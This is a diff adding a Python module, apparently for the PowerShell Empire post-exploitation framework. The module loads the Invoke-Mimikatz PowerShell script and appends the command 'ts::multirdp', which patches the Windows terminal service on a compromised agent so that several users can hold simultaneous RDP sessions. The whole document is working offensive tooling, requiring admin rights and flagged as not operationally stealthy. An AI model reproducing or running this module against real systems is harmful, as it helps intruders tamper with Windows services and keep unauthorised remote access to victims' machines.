@@ -1,0 +1,72 @@
+from lib.common import helpers
+
+class Module:
+
+    def __init__(self, mainMenu, params=[]):
+
+        self.info = {
+            'Name': 'Invoke-Mimikatz Multirdp',
+
+            'Author': ['@gentilkiwi', '@JosephBialek'],
+
+            'Description': ("[!] WARNING: Experimental! Runs PowerSploit's Invoke-Mimikatz "
+                            "function to patch the Windows terminal service to allow "
+                            "multiple users to establish simultaneous RDP connections."),
+
+            'Background' : True,
+
+            'OutputExtension' : None,
+            
+            'NeedsAdmin' : True,
+
+            'OpsecSafe' : False,
+
+            'MinPSVersion' : '2',
+            
+            'Comments': [
+                'http://blog.gentilkiwi.com',
+                'http://clymb3r.wordpress.com/'
+            ]
+        }
+
+        # any options needed by the module, settable during runtime
+        self.options = {
+            # format:
+            #   value_name : {description, required, default_value}
+            'Agent' : {
+                'Description'   :   'Agent to run module on.',
+                'Required'      :   True,
+                'Value'         :   ''
+            }
+        }
+
+        # save off a copy of the mainMenu object to access external functionality
+        #   like listeners/agent handlers/etc.
+        self.mainMenu = mainMenu
+        
+        for param in params:
+            # parameter format is [Name, Value]
+            option, value = param
+            if option in self.options:
+                self.options[option]['Value'] = value
+
+
+    def generate(self):
+        
+        # read in the common module source code
+        moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
+
+        try:
+            f = open(moduleSource, 'r')
+        except:
+            print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
+            return ""
+
+        moduleCode = f.read()
+        f.close()
+
+        script = moduleCode
+
+        script += "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
+
+        return script
